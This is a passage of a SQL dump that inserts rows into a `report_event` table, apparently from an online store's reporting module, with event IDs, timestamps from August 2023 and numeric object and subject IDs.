(6057, '2023-08-15 03:15:26', 1, 2061, 0, 1, 1),
(6058, '2023-08-15 04:12:44', 1, 2059, 0, 1, 1),
(6059, '2023-08-15 06:06:59', 1, 2061, 0, 1, 1),
(6060, '2023-08-15 08:48:01', 1, 2053, 0, 1, 1),
(6061, '2023-08-15 08:48:12', 1, 2058, 0, 1, 1),
(6062, '2023-08-15 08:49:46', 1, 2054, 0, 1, 1),
(6063, '2023-08-15 08:52:02', 1, 2061, 0, 1, 1),
(6064, '2023-08-15 08:52:34', 1, 2060, 0, 1, 1),
(6065, '2023-08-15 08:53:36', 1, 2055, 0, 1, 1),
(6066, '2023-08-15 08:55:31', 1, 2064, 0, 1, 1),
(6067, '2023-08-15 08:55:41', 1, 2063, 0, 1, 1),
(6068, '2023-08-15 08:56:54', 1, 2061, 0, 1, 1),
(6069, '2023-08-15 08:57:14', 1, 2053, 0, 1, 1),
(6070, '2023-08-15 08:57:56', 1, 2064, 0, 1, 1),
(6071, '2023-08-15 08:58:07', 1, 2059, 0, 1, 1),
(6072, '2023-08-15 08:58:59', 1, 2055, 0, 1, 1),
(6073, '2023-08-15 08:59:10', 1, 2059, 0, 1, 1),
(6074, '2023-08-15 09:00:03', 1, 2062, 0, 1, 1),
(6075, '2023-08-15 09:01:57', 1, 2054, 0, 1, 1),
(6076, '2023-08-15 09:02:08', 1, 2058, 0, 1, 1),
(6077, '2023-08-15 09:05:39', 1, 2063, 0, 1, 1),
(6078, '2023-08-15 09:06:00', 1, 2062, 0, 1, 1),
(6079, '2023-08-15 09:06:11', 1, 2060, 0, 1, 1),
(6080, '2023-08-15 09:29:43', 1, 2061, 1039, 1, 1),
(6081, '2023-08-15 09:29:51', 1, 2059, 1039, 1, 1),
(6082, '2023-08-15 09:29:55', 1, 2064, 1039, 1, 1),
(6083, '2023-08-15 09:30:01', 1, 2058, 1039, 1, 1),
(6084, '2023-08-15 09:30:04', 1, 2063, 1039, 1, 1),
(6085, '2023-08-15 09:30:07', 1, 2062, 1039, 1, 1),
(6086, '2023-08-15 09:30:09', 1, 2054, 1039, 1, 1),
(6087, '2023-08-15 09:30:11', 1, 2060, 1039, 1, 1),
(6088, '2023-08-15 09:30:13', 1, 2055, 1039, 1, 1),
(6089, '2023-08-15 09:31:30', 1, 2061, 1039, 1, 1),
(6090, '2023-08-15 09:31:31', 1, 2061, 1039, 1, 1),
(6091, '2023-08-15 09:31:32', 1, 2061, 1039, 1, 1),
(6092, '2023-08-15 09:31:39', 1, 2061, 1039, 1, 1),
(6093, '2023-08-15 09:31:40', 1, 2061, 1039, 1, 1),
(6094, '2023-08-15 09:31:41', 1, 2061, 1039, 1, 1),
(6095, '2023-08-15 09:31:48', 1, 2061, 1039, 1, 1),
(6096, '2023-08-15 09:31:49', 1, 2061, 1039, 1, 1),
(6097, '2023-08-15 09:31:50', 1, 2061, 1039, 1, 1),
(6098, '2023-08-15 09:31:57', 1, 2059, 1039, 1, 1),
(6099, '2023-08-15 09:31:58', 1, 2061, 1039, 1, 1),
(6100, '2023-08-15 09:32:00', 1, 2059, 1039, 1, 1),
(6101, '2023-08-15 09:32:01', 1, 2059, 1039, 1, 1),
(6102, '2023-08-15 09:32:06', 1, 2061, 1039, 1, 1),
(6103, '2023-08-15 09:32:08', 1, 2059, 1039, 1, 1),
(6104, '2023-08-15 09:32:10', 1, 2059, 1039, 1, 1),
(6105, '2023-08-15 09:32:12', 1, 2059, 1039, 1, 1),
(6106, '2023-08-15 09:32:16', 1, 2061, 1039, 1, 1),
(6107, '2023-08-15 09:32:18', 1, 2059, 1039, 1, 1),
(6108, '2023-08-15 09:32:19', 1, 2059, 1039, 1, 1),
(6109, '2023-08-15 09:32:21', 1, 2059, 1039, 1, 1),
(6110, '2023-08-15 09:32:24', 1, 2064, 1039, 1, 1),
(6111, '2023-08-15 09:32:26', 1, 2061, 1039, 1, 1),
(6112, '2023-08-15 09:32:29', 1, 2064, 1039, 1, 1),
(6113, '2023-08-15 09:32:29', 1, 2059, 1039, 1, 1),
(6114, '2023-08-15 09:32:31', 1, 2064, 1039, 1, 1),
(6115, '2023-08-15 09:32:34', 1, 2064, 1039, 1, 1),
(6116, '2023-08-15 09:32:35', 1, 2061, 1039, 1, 1),
(6117, '2023-08-15 09:32:39', 1, 2059, 1039, 1, 1),
(6118, '2023-08-15 09:32:40', 1, 2064, 1039, 1, 1),
(6119, '2023-08-15 09:32:40', 1, 2058, 1039, 1, 1),
(6120, '2023-08-15 09:32:42', 1, 2058, 1039, 1, 1),
(6121, '2023-08-15 09:32:44', 1, 2064, 1039, 1, 1),
(6122, '2023-08-15 09:32:47', 1, 2061, 1039, 1, 1),
(6123, '2023-08-15 09:32:48', 1, 2064, 1039, 1, 1),
(6124, '2023-08-15 09:32:50', 1, 2064, 1039, 1, 1),
(6125, '2023-08-15 09:32:51', 1, 2059, 1039, 1, 1),
(6126, '2023-08-15 09:32:53', 1, 2058, 1039, 1, 1),
(6127, '2023-08-15 09:32:54', 1, 2058, 1039, 1, 1),
(6128, '2023-08-15 09:32:57', 1, 2058, 1039, 1, 1),
(6129, '2023-08-15 09:32:59', 1, 2064, 1039, 1, 1),
(6130, '2023-08-15 09:33:01', 1, 2061, 1039, 1, 1),
(6131, '2023-08-15 09:33:02', 1, 2064, 1039, 1, 1),
(6132, '2023-08-15 09:33:03', 1, 2059, 1039, 1, 1),
(6133, '2023-08-15 09:33:06', 1, 2058, 1039, 1, 1),
(6134, '2023-08-15 09:33:07', 1, 2058, 1039, 1, 1),
(6135, '2023-08-15 09:33:10', 1, 2063, 1039, 1, 1),
(6136, '2023-08-15 09:33:11', 1, 2058, 1039, 1, 1),
(6137, '2023-08-15 09:33:12', 1, 2061, 1039, 1, 1),
(6138, '2023-08-15 09:33:13', 1, 2064, 1039, 1, 1),
(6139, '2023-08-15 09:33:15', 1, 2059, 1039, 1, 1),
(6140, '2023-08-15 09:33:16', 1, 2063, 1039, 1, 1),
(6141, '2023-08-15 09:33:17', 1, 2063, 1039, 1, 1),
(6142, '2023-08-15 09:33:22', 1, 2063, 1039, 1, 1),
(6143, '2023-08-15 09:33:22', 1, 2061, 1039, 1, 1),
(6144, '2023-08-15 09:33:24', 1, 2064, 1039, 1, 1),
(6145, '2023-08-15 09:33:26', 1, 2058, 1039, 1, 1),
(6146, '2023-08-15 09:33:27', 1, 2059, 1039, 1, 1),
(6147, '2023-08-15 09:33:28', 1, 2063, 1039, 1, 1),
(6148, '2023-08-15 09:33:31', 1, 2063, 1039, 1, 1),
(6149, '2023-08-15 09:33:35', 1, 2064, 1039, 1, 1),
(6150, '2023-08-15 09:33:36', 1, 2058, 1039, 1, 1),
(6151, '2023-08-15 09:33:37', 1, 2063, 1039, 1, 1),
(6152, '2023-08-15 09:33:38', 1, 2063, 1039, 1, 1),
(6153, '2023-08-15 09:33:40', 1, 2059, 1039, 1, 1),
(6154, '2023-08-15 09:33:43', 1, 2063, 1039, 1, 1),
(6155, '2023-08-15 09:33:45', 1, 2064, 1039, 1, 1),
(6156, '2023-08-15 09:33:47', 1, 2058, 1039, 1, 1),
(6157, '2023-08-15 09:33:48', 1, 2062, 1039, 1, 1),
(6158, '2023-08-15 09:33:50', 1, 2059, 1039, 1, 1),
(6159, '2023-08-15 09:33:52', 1, 2062, 1039, 1, 1),
(6160, '2023-08-15 09:33:54', 1, 2063, 1039, 1, 1),
(6161, '2023-08-15 09:33:55', 1, 2064, 1039, 1, 1),
(6162, '2023-08-15 09:33:58', 1, 2058, 1039, 1, 1),
(6163, '2023-08-15 09:33:59', 1, 2062, 1039, 1, 1),
(6164, '2023-08-15 09:33:59', 1, 2059, 1039, 1, 1),
(6165, '2023-08-15 09:34:01', 1, 2062, 1039, 1, 1),
(6166, '2023-08-15 09:34:02', 1, 2062, 1039, 1, 1),
(6167, '2023-08-15 09:34:04', 1, 2063, 1039, 1, 1),
(6168, '2023-08-15 09:34:07', 1, 2058, 1039, 1, 1),
(6169, '2023-08-15 09:34:08', 1, 2062, 1039, 1, 1),
(6170, '2023-08-15 09:34:09', 1, 2064, 1039, 1, 1),
(6171, '2023-08-15 09:34:11', 1, 2062, 1039, 1, 1),
(6172, '2023-08-15 09:34:12', 1, 2063, 1039, 1, 1),
(6173, '2023-08-15 09:34:13', 1, 2062, 1039, 1, 1),
(6174, '2023-08-15 09:34:17', 1, 2058, 1039, 1, 1),
(6175, '2023-08-15 09:34:18', 1, 2062, 1039, 1, 1),
(6176, '2023-08-15 09:34:19', 1, 2064, 1039, 1, 1),
(6177, '2023-08-15 09:34:20', 1, 2054, 1039, 1, 1),
(6178, '2023-08-15 09:34:22', 1, 2054, 1039, 1, 1),
(6179, '2023-08-15 09:34:22', 1, 2063, 1039, 1, 1),
(6180, '2023-08-15 09:34:23', 1, 2054, 1039, 1, 1),
(6181, '2023-08-15 09:34:27', 1, 2058, 1039, 1, 1),
(6182, '2023-08-15 09:34:28', 1, 2062, 1039, 1, 1),
(6183, '2023-08-15 09:34:29', 1, 2064, 1039, 1, 1),
(6184, '2023-08-15 09:34:30', 1, 2054, 1039, 1, 1),
(6185, '2023-08-15 09:34:32', 1, 2063, 1039, 1, 1),
(6186, '2023-08-15 09:34:33', 1, 2054, 1039, 1, 1),
(6187, '2023-08-15 09:34:34', 1, 2054, 1039, 1, 1),
(6188, '2023-08-15 09:34:38', 1, 2062, 1039, 1, 1),
(6189, '2023-08-15 09:34:40', 1, 2058, 1039, 1, 1),
(6190, '2023-08-15 09:34:40', 1, 2054, 1039, 1, 1),
(6191, '2023-08-15 09:34:42', 1, 2063, 1039, 1, 1),
(6192, '2023-08-15 09:34:43', 1, 2054, 1039, 1, 1),
(6193, '2023-08-15 09:34:45', 1, 2054, 1039, 1, 1),
(6194, '2023-08-15 09:34:48', 1, 2062, 1039, 1, 1),
(6195, '2023-08-15 09:34:51', 1, 2058, 1039, 1, 1),
(6196, '2023-08-15 09:34:52', 1, 2060, 1039, 1, 1),
(6197, '2023-08-15 09:34:54', 1, 2060, 1039, 1, 1),
(6198, '2023-08-15 09:34:55', 1, 2060, 1039, 1, 1),
(6199, '2023-08-15 09:34:55', 1, 2055, 1039, 1, 1),
(6200, '2023-08-15 09:34:56', 1, 2054, 1039, 1, 1),
(6201, '2023-08-15 09:34:57', 1, 2063, 1039, 1, 1),
(6202, '2023-08-15 09:35:00', 1, 2062, 1039, 1, 1),
(6203, '2023-08-15 09:35:02', 1, 2060, 1039, 1, 1),
(6204, '2023-08-15 09:35:03', 1, 2060, 1039, 1, 1),
(6205, '2023-08-15 09:35:05', 1, 2058, 1039, 1, 1),
(6206, '2023-08-15 09:35:06', 1, 2063, 1039, 1, 1),
(6207, '2023-08-15 09:35:07', 1, 2060, 1039, 1, 1),
(6208, '2023-08-15 09:35:07', 1, 2055, 1039, 1, 1),
(6209, '2023-08-15 09:35:08', 1, 2055, 1039, 1, 1),
(6210, '2023-08-15 09:35:09', 1, 2054, 1039, 1, 1),
(6211, '2023-08-15 09:35:10', 1, 2055, 1039, 1, 1),
(6212, '2023-08-15 09:35:11', 1, 2062, 1039, 1, 1),
(6213, '2023-08-15 09:35:14', 1, 2060, 1039, 1, 1),
(6214, '2023-08-15 09:35:16', 1, 2060, 1039, 1, 1),
(6215, '2023-08-15 09:35:17', 1, 2063, 1039, 1, 1),
(6216, '2023-08-15 09:35:18', 1, 2055, 1039, 1, 1),
(6217, '2023-08-15 09:35:19', 1, 2054, 1039, 1, 1),
(6218, '2023-08-15 09:35:19', 1, 2055, 1039, 1, 1),
(6219, '2023-08-15 09:35:21', 1, 2055, 1039, 1, 1),
(6220, '2023-08-15 09:35:21', 1, 2062, 1039, 1, 1),
(6221, '2023-08-15 09:35:23', 1, 2060, 1039, 1, 1),
(6222, '2023-08-15 09:35:27', 1, 2060, 1039, 1, 1),
(6223, '2023-08-15 09:35:28', 1, 2054, 1039, 1, 1),
(6224, '2023-08-15 09:35:29', 1, 2055, 1039, 1, 1),
(6225, '2023-08-15 09:35:30', 1, 2062, 1039, 1, 1),
(6226, '2023-08-15 09:35:31', 1, 2055, 1039, 1, 1),
(6227, '2023-08-15 09:35:37', 1, 2060, 1039, 1, 1),
(6228, '2023-08-15 09:35:38', 1, 2062, 1039, 1, 1),
(6229, '2023-08-15 09:35:40', 1, 2055, 1039, 1, 1),
(6230, '2023-08-15 09:35:41', 1, 2054, 1039, 1, 1),
(6231, '2023-08-15 09:35:46', 1, 2060, 1039, 1, 1),
(6232, '2023-08-15 09:35:48', 1, 2054, 1039, 1, 1),
(6233, '2023-08-15 09:35:49', 1, 2055, 1039, 1, 1),
(6234, '2023-08-15 09:35:50', 1, 2062, 1039, 1, 1),
(6235, '2023-08-15 09:35:56', 1, 2060, 1039, 1, 1),
(6236, '2023-08-15 09:35:57', 1, 2054, 1039, 1, 1),
(6237, '2023-08-15 09:36:00', 1, 2055, 1039, 1, 1),
(6238, '2023-08-15 09:36:05', 1, 2060, 1039, 1, 1),
(6239, '2023-08-15 09:36:06', 1, 2054, 1039, 1, 1),
(6240, '2023-08-15 09:36:08', 1, 2055, 1039, 1, 1),
(6241, '2023-08-15 09:36:15', 1, 2060, 1039, 1, 1),
(6242, '2023-08-15 09:36:17', 1, 2055, 1039, 1, 1),
(6243, '2023-08-15 09:36:20', 1, 2054, 1039, 1, 1),
(6244, '2023-08-15 09:36:27', 1, 2055, 1039, 1, 1),
(6245, '2023-08-15 09:36:28', 1, 2060, 1039, 1, 1),
(6246, '2023-08-15 09:36:38', 1, 2060, 1039, 1, 1),
(6247, '2023-08-15 09:36:39', 1, 2055, 1039, 1, 1),
(6248, '2023-08-15 09:36:48', 1, 2060, 1039, 1, 1),
(6249, '2023-08-15 09:36:50', 1, 2055, 1039, 1, 1),
(6250, '2023-08-15 09:37:00', 1, 2055, 1039, 1, 1),
(6251, '2023-08-15 13:34:01', 1, 2061, 0, 1, 1),
(6252, '2023-08-15 16:04:10', 1, 2061, 0, 1, 1),
(6253, '2023-08-15 16:51:26', 1, 2053, 0, 1, 1),
(6254, '2023-08-15 16:51:30', 1, 2054, 0, 1, 1),
(6255, '2023-08-15 16:51:34', 1, 2055, 0, 1, 1),
(6256, '2023-08-15 16:51:46', 1, 2064, 0, 1, 1),
(6257, '2023-08-15 16:51:54', 1, 2063, 0, 1, 1),
(6258, '2023-08-15 16:51:59', 1, 2062, 0, 1, 1),
(6259, '2023-08-15 16:52:02', 1, 2060, 0, 1, 1),
(6260, '2023-08-15 16:52:07', 1, 2059, 0, 1, 1),
(6261, '2023-08-15 16:52:12', 1, 2061, 0, 1, 1),
(6262, '2023-08-15 16:52:15', 1, 2058, 0, 1, 1),
(6263, '2023-08-15 17:22:31', 1, 2064, 0, 1, 1),
(6264, '2023-08-15 19:08:00', 1, 2053, 0, 1, 1),
(6265, '2023-08-15 19:08:10', 1, 2058, 0, 1, 1),
(6266, '2023-08-15 19:09:45', 1, 2054, 0, 1, 1),
(6267, '2023-08-15 19:12:02', 1, 2061, 0, 1, 1),
(6268, '2023-08-15 19:12:33', 1, 2060, 0, 1, 1),
(6269, '2023-08-15 19:13:36', 1, 2055, 0, 1, 1),
(6270, '2023-08-15 19:15:31', 1, 2064, 0, 1, 1),
(6271, '2023-08-15 19:15:42', 1, 2063, 0, 1, 1),
(6272, '2023-08-15 19:16:56', 1, 2061, 0, 1, 1),
(6273, '2023-08-15 19:17:18', 1, 2053, 0, 1, 1),
(6274, '2023-08-15 19:18:00', 1, 2064, 0, 1, 1),
(6275, '2023-08-15 19:18:11', 1, 2059, 0, 1, 1),
(6276, '2023-08-15 19:19:03', 1, 2055, 0, 1, 1),
(6277, '2023-08-15 19:19:13', 1, 2059, 0, 1, 1),
(6278, '2023-08-15 19:20:05', 1, 2062, 0, 1, 1),
(6279, '2023-08-15 19:22:00', 1, 2054, 0, 1, 1),
(6280, '2023-08-15 19:22:10', 1, 2058, 0, 1, 1),
(6281, '2023-08-15 19:25:42', 1, 2063, 0, 1, 1),
(6282, '2023-08-15 19:26:04', 1, 2062, 0, 1, 1),
(6283, '2023-08-15 19:26:14', 1, 2060, 0, 1, 1),
(6284, '2023-08-15 19:45:13', 1, 2055, 0, 1, 1),
(6285, '2023-08-15 20:17:39', 1, 2054, 0, 1, 1),
(6286, '2023-08-16 04:48:49', 1, 2059, 0, 1, 1),
(6287, '2023-08-16 04:51:22', 1, 2059, 0, 1, 1),
(6288, '2023-08-16 06:48:54', 1, 2064, 0, 1, 1),
(6289, '2023-08-16 08:27:19', 1, 2059, 0, 1, 1),
(6290, '2023-08-16 08:28:29', 1, 2060, 0, 1, 1),
(6291, '2023-08-16 08:29:37', 1, 2055, 0, 1, 1),
(6292, '2023-08-16 08:30:38', 1, 2054, 0, 1, 1),
(6293, '2023-08-16 08:30:55', 1, 2060, 0, 1, 1),
(6294, '2023-08-16 08:31:10', 1, 2063, 0, 1, 1),
(6295, '2023-08-16 08:31:41', 1, 2058, 0, 1, 1),
(6296, '2023-08-16 08:31:57', 1, 2062, 0, 1, 1),
(6297, '2023-08-16 10:05:14', 4, 2061, 1050, 1, 1),
(6298, '2023-08-16 12:57:21', 1, 2054, 0, 1, 1),
(6299, '2023-08-16 13:47:31', 1, 2060, 0, 1, 1),
(6300, '2023-08-16 13:48:43', 1, 2059, 0, 1, 1),
(6301, '2023-08-16 13:51:56', 1, 2059, 0, 1, 1),
(6302, '2023-08-16 17:25:30', 1, 2063, 0, 1, 1),
(6303, '2023-08-16 17:47:59', 1, 2063, 0, 1, 1),
(6304, '2023-08-16 18:20:35', 4, 2061, 1055, 1, 1),
(6305, '2023-08-17 03:43:38', 1, 2054, 0, 1, 1),
(6306, '2023-08-17 05:42:42', 1, 2054, 0, 1, 1),
(6307, '2023-08-17 07:52:02', 1, 2059, 0, 1, 1),
(6308, '2023-08-17 07:53:01', 1, 2060, 0, 1, 1),
(6309, '2023-08-17 07:54:01', 1, 2055, 0, 1, 1),
(6310, '2023-08-17 07:54:59', 1, 2054, 0, 1, 1),
(6311, '2023-08-17 07:55:21', 1, 2060, 0, 1, 1),
(6312, '2023-08-17 07:55:30', 1, 2063, 0, 1, 1),
(6313, '2023-08-17 07:55:40', 1, 2058, 0, 1, 1),
(6314, '2023-08-17 07:55:41', 1, 2063, 0, 1, 1),
(6315, '2023-08-17 07:55:51', 1, 2062, 0, 1, 1),
(6316, '2023-08-17 11:54:35', 4, 2061, 1063, 1, 1),
(6317, '2023-08-17 12:00:39', 4, 2061, 1064, 1, 1),
(6318, '2023-08-17 23:55:14', 1, 2058, 0, 1, 1),
(6319, '2023-08-18 02:18:36', 4, 2061, 1065, 1, 1),
(6320, '2023-08-18 02:18:37', 4, 2061, 1066, 1, 1),
(6321, '2023-08-18 05:56:19', 1, 2059, 0, 1, 1),
(6322, '2023-08-18 07:20:07', 1, 2060, 0, 1, 1),
(6323, '2023-08-18 07:21:38', 1, 2055, 0, 1, 1),
(6324, '2023-08-18 07:22:50', 1, 2054, 0, 1, 1),
(6325, '2023-08-18 07:24:33', 1, 2060, 0, 1, 1),
(6326, '2023-08-18 07:25:54', 1, 2063, 0, 1, 1),
(6327, '2023-08-18 07:26:07', 1, 2058, 0, 1, 1),
(6328, '2023-08-18 07:26:29', 1, 2062, 0, 1, 1),
(6329, '2023-08-18 09:04:01', 1, 2061, 0, 1, 1),
(6330, '2023-08-18 18:21:39', 1, 2064, 0, 1, 1),
(6331, '2023-08-19 00:47:01', 1, 2060, 0, 1, 1),
(6332, '2023-08-19 00:48:01', 1, 2055, 0, 1, 1),
(6333, '2023-08-19 00:49:03', 1, 2054, 0, 1, 1),
(6334, '2023-08-19 00:50:01', 1, 2060, 0, 1, 1),
(6335, '2023-08-19 00:51:01', 1, 2063, 0, 1, 1),
(6336, '2023-08-19 00:52:03', 1, 2058, 0, 1, 1),
(6337, '2023-08-19 00:53:07', 1, 2062, 0, 1, 1),
(6338, '2023-08-19 01:08:55', 1, 2063, 0, 1, 1),
(6339, '2023-08-19 02:08:29', 1, 2059, 0, 1, 1),
(6340, '2023-08-19 02:13:34', 1, 2062, 0, 1, 1),
(6341, '2023-08-19 08:47:20', 1, 2064, 0, 1, 1),
(6342, '2023-08-19 11:17:08', 1, 2064, 0, 1, 1),
(6343, '2023-08-19 23:38:06', 1, 2061, 0, 1, 1),
(6344, '2023-08-20 05:14:58', 1, 2059, 0, 1, 1),
(6345, '2023-08-20 05:41:05', 4, 2061, 1075, 1, 1),
(6346, '2023-08-20 10:05:40', 1, 2055, 0, 1, 1),
(6347, '2023-08-20 11:16:03', 1, 2063, 0, 1, 1),
(6348, '2023-08-20 11:16:30', 1, 2063, 0, 1, 1),
(6349, '2023-08-21 03:50:47', 1, 2064, 0, 1, 1),
(6350, '2023-08-21 09:27:03', 1, 2054, 0, 1, 1),
(6351, '2023-08-21 10:09:37', 1, 2060, 0, 1, 1),
(6352, '2023-08-21 10:53:33', 1, 2061, 0, 1, 1),
(6353, '2023-08-21 11:58:02', 1, 2059, 0, 1, 1),
(6354, '2023-08-21 12:48:10', 1, 2064, 0, 1, 1),
(6355, '2023-08-21 13:32:17', 1, 2062, 0, 1, 1),
(6356, '2023-08-21 13:59:54', 1, 2055, 0, 1, 1),
(6357, '2023-08-21 14:39:33', 1, 2055, 0, 1, 1),
(6358, '2023-08-21 15:28:36', 1, 2054, 0, 1, 1),
(6359, '2023-08-21 16:27:56', 1, 2054, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(6360, '2023-08-21 17:06:27', 1, 2060, 0, 1, 1),
(6361, '2023-08-21 17:32:53', 1, 2063, 0, 1, 1),
(6362, '2023-08-21 17:46:51', 1, 2061, 0, 1, 1),
(6363, '2023-08-21 17:59:55', 1, 2063, 0, 1, 1),
(6364, '2023-08-21 18:46:12', 1, 2059, 0, 1, 1),
(6365, '2023-08-21 19:32:28', 1, 2064, 0, 1, 1),
(6366, '2023-08-21 20:13:17', 1, 2062, 0, 1, 1),
(6367, '2023-08-21 21:15:34', 1, 2055, 0, 1, 1),
(6368, '2023-08-21 22:14:55', 1, 2063, 0, 1, 1),
(6369, '2023-08-21 22:32:08', 1, 2058, 0, 1, 1),
(6370, '2023-08-21 23:45:05', 1, 2054, 0, 1, 1),
(6371, '2023-08-22 01:08:36', 1, 2054, 0, 1, 1),
(6372, '2023-08-22 01:43:56', 1, 2054, 0, 1, 1),
(6373, '2023-08-22 02:25:29', 1, 2060, 0, 1, 1),
(6374, '2023-08-22 03:08:22', 1, 2061, 0, 1, 1),
(6375, '2023-08-22 03:18:03', 1, 2059, 0, 1, 1),
(6376, '2023-08-22 03:36:02', 1, 2061, 0, 1, 1),
(6377, '2023-08-22 03:48:11', 1, 2054, 0, 1, 1),
(6378, '2023-08-22 04:28:09', 1, 2060, 0, 1, 1),
(6379, '2023-08-22 05:09:25', 1, 2061, 0, 1, 1),
(6380, '2023-08-22 06:11:21', 1, 2059, 0, 1, 1),
(6381, '2023-08-22 06:58:53', 1, 2064, 0, 1, 1),
(6382, '2023-08-22 07:41:34', 1, 2062, 0, 1, 1),
(6383, '2023-08-22 08:46:53', 1, 2055, 0, 1, 1),
(6384, '2023-08-22 10:04:33', 1, 2054, 0, 1, 1),
(6385, '2023-08-22 10:44:19', 1, 2060, 0, 1, 1),
(6386, '2023-08-22 11:25:28', 1, 2061, 0, 1, 1),
(6387, '2023-08-22 12:25:47', 1, 2059, 0, 1, 1),
(6388, '2023-08-22 13:12:05', 1, 2064, 0, 1, 1),
(6389, '2023-08-22 13:20:08', 1, 2062, 0, 1, 1),
(6390, '2023-08-22 13:53:09', 1, 2062, 0, 1, 1),
(6391, '2023-08-22 14:44:22', 1, 2054, 0, 1, 1),
(6392, '2023-08-22 14:56:19', 1, 2055, 0, 1, 1),
(6393, '2023-08-22 16:04:06', 1, 2054, 0, 1, 1),
(6394, '2023-08-22 16:43:48', 1, 2060, 0, 1, 1),
(6395, '2023-08-22 17:20:04', 1, 2054, 0, 1, 1),
(6396, '2023-08-22 17:24:12', 1, 2061, 0, 1, 1),
(6397, '2023-08-22 18:23:40', 1, 2059, 0, 1, 1),
(6398, '2023-08-22 19:09:59', 1, 2064, 0, 1, 1),
(6399, '2023-08-22 20:09:02', 1, 2054, 0, 1, 1),
(6400, '2023-08-22 20:48:18', 1, 2060, 0, 1, 1),
(6401, '2023-08-22 21:29:15', 1, 2061, 0, 1, 1),
(6402, '2023-08-22 22:28:37', 1, 2059, 0, 1, 1),
(6403, '2023-08-22 23:14:49', 1, 2064, 0, 1, 1),
(6404, '2023-08-22 23:46:49', 1, 2054, 0, 1, 1),
(6405, '2023-08-23 00:26:05', 1, 2060, 0, 1, 1),
(6406, '2023-08-23 01:06:25', 1, 2061, 0, 1, 1),
(6407, '2023-08-23 02:06:21', 1, 2059, 0, 1, 1),
(6408, '2023-08-23 02:55:12', 1, 2064, 0, 1, 1),
(6409, '2023-08-23 03:42:22', 1, 2062, 0, 1, 1),
(6410, '2023-08-23 04:24:03', 1, 2063, 0, 1, 1),
(6411, '2023-08-23 04:52:32', 1, 2055, 0, 1, 1),
(6412, '2023-08-23 05:10:05', 1, 2059, 0, 1, 1),
(6413, '2023-08-23 05:51:56', 1, 2063, 0, 1, 1),
(6414, '2023-08-23 06:09:14', 1, 2058, 0, 1, 1),
(6415, '2023-08-23 06:09:20', 1, 2058, 0, 1, 1),
(6416, '2023-08-23 07:55:02', 1, 2054, 0, 1, 1),
(6417, '2023-08-23 13:04:17', 1, 2058, 0, 1, 1),
(6418, '2023-08-23 15:12:09', 1, 2059, 0, 1, 1),
(6419, '2023-08-23 15:12:27', 1, 2060, 0, 1, 1),
(6420, '2023-08-23 20:10:26', 1, 2054, 0, 1, 1),
(6421, '2023-08-23 20:49:43', 1, 2060, 0, 1, 1),
(6422, '2023-08-23 21:54:24', 1, 2054, 0, 1, 1),
(6423, '2023-08-23 22:31:56', 1, 2060, 0, 1, 1),
(6424, '2023-08-23 23:16:53', 1, 2054, 0, 1, 1),
(6425, '2023-08-23 23:54:10', 1, 2060, 0, 1, 1),
(6426, '2023-08-24 00:34:05', 1, 2061, 0, 1, 1),
(6427, '2023-08-24 00:39:45', 1, 2061, 0, 1, 1),
(6428, '2023-08-24 01:34:24', 1, 2059, 0, 1, 1),
(6429, '2023-08-24 01:48:19', 1, 2064, 0, 1, 1),
(6430, '2023-08-24 02:21:47', 1, 2064, 0, 1, 1),
(6431, '2023-08-24 03:03:16', 1, 2062, 0, 1, 1),
(6432, '2023-08-24 03:47:30', 1, 2054, 0, 1, 1),
(6433, '2023-08-24 04:26:12', 1, 2060, 0, 1, 1),
(6434, '2023-08-24 05:06:25', 1, 2061, 0, 1, 1),
(6435, '2023-08-24 06:06:22', 1, 2059, 0, 1, 1),
(6436, '2023-08-24 06:18:18', 1, 2061, 0, 1, 1),
(6437, '2023-08-24 06:53:02', 1, 2064, 0, 1, 1),
(6438, '2023-08-24 07:34:17', 1, 2062, 0, 1, 1),
(6439, '2023-08-24 07:38:27', 1, 2062, 0, 1, 1),
(6440, '2023-08-24 08:38:08', 1, 2055, 0, 1, 1),
(6441, '2023-08-24 09:38:19', 1, 2063, 0, 1, 1),
(6442, '2023-08-24 09:39:53', 1, 2064, 0, 1, 1),
(6443, '2023-08-24 10:09:47', 1, 2054, 0, 1, 1),
(6444, '2023-08-24 10:49:36', 1, 2060, 0, 1, 1),
(6445, '2023-08-24 11:31:04', 1, 2061, 0, 1, 1),
(6446, '2023-08-24 12:32:41', 1, 2059, 0, 1, 1),
(6447, '2023-08-24 13:20:27', 1, 2064, 0, 1, 1),
(6448, '2023-08-24 14:02:39', 1, 2062, 0, 1, 1),
(6449, '2023-08-24 14:54:52', 1, 2061, 0, 1, 1),
(6450, '2023-08-24 15:07:53', 1, 2055, 0, 1, 1),
(6451, '2023-08-24 16:08:46', 1, 2063, 0, 1, 1),
(6452, '2023-08-24 16:26:43', 1, 2058, 0, 1, 1),
(6453, '2023-08-24 17:30:40', 1, 2061, 0, 1, 1),
(6454, '2023-08-24 18:21:48', 1, 2061, 0, 1, 1),
(6455, '2023-08-25 00:59:13', 1, 2059, 0, 1, 1),
(6456, '2023-08-25 02:40:00', 1, 2053, 0, 1, 1),
(6457, '2023-08-25 02:45:44', 1, 2054, 0, 1, 1),
(6458, '2023-08-25 02:56:34', 1, 2059, 0, 1, 1),
(6459, '2023-08-25 03:26:12', 1, 2060, 0, 1, 1),
(6460, '2023-08-25 04:07:48', 1, 2061, 0, 1, 1),
(6461, '2023-08-25 04:59:19', 1, 2054, 0, 1, 1),
(6462, '2023-08-25 04:59:23', 1, 2059, 0, 1, 1),
(6463, '2023-08-25 04:59:26', 1, 2061, 0, 1, 1),
(6464, '2023-08-25 04:59:30', 1, 2058, 0, 1, 1),
(6465, '2023-08-25 05:09:29', 1, 2059, 0, 1, 1),
(6466, '2023-08-25 05:47:48', 1, 2064, 0, 1, 1),
(6467, '2023-08-25 05:57:45', 1, 2064, 0, 1, 1),
(6468, '2023-08-25 06:40:00', 1, 2062, 0, 1, 1),
(6469, '2023-08-25 06:50:18', 1, 2064, 0, 1, 1),
(6470, '2023-08-25 07:45:26', 1, 2055, 0, 1, 1),
(6471, '2023-08-25 08:46:26', 1, 2063, 0, 1, 1),
(6472, '2023-08-25 09:04:00', 1, 2058, 0, 1, 1),
(6473, '2023-08-25 09:39:53', 1, 2064, 0, 1, 1),
(6474, '2023-08-25 14:21:48', 1, 2061, 0, 1, 1),
(6475, '2023-08-26 01:20:20', 1, 2062, 0, 1, 1),
(6476, '2023-08-26 01:59:10', 1, 2055, 0, 1, 1),
(6477, '2023-08-26 03:22:30', 1, 2064, 0, 1, 1),
